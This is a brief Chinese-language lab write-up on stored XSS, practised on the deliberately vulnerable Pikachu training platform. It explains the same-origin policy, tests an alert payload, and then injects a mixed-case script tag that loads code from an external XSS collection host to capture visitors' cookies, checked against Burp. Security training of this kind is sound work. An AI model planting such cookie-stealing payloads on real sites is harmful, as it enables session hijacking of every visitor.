cookie為了安全存在同源策略(瀏覽器的同源策略,限制了不同源的Js,對當前頁面的資源和屬性的權限。保護了a.com域名下的資源不被來自其他頁面腳本被讀取或篡改)
攻擊者事先將惡意代碼上傳或儲存到漏洞服務器中,只要受害者瀏覽包含此惡意代碼的頁面就會執行惡意代碼。這就意味着只要訪問了這個頁面的訪客,都有可能會執行這段惡意腳本,因此儲存型XSS的危害會更大。因為存儲型XSS的代碼存在於網頁的代碼中,可以說是永久型的。
存儲型 XSS 一般出現在網站留言、評論、博客日志等交互處,惡意腳本存儲到客戶端或者服務端的數據庫中。
打開pikachu平台的存儲型xss 輸入東西發現發會存在頁面上,也就是會永久保存這樣我們就可以使用存儲型xss

這時候我們看到,他並沒有做任何處理。

這時候輸入<script>alert(111)</script>.有彈窗。

這個時候我們輸入<sCRiPt/SrC=//xs.sb/QX9N> 語句。這個是連接到外部xss平台的。我們就可以在平台上看到我們自己訪問的cookie值。用burp攔截發現cookie一致。


最后我把這條payload刪除掉了,因為他是永久存儲在數據庫中。防止以后使用時會發生不便情況

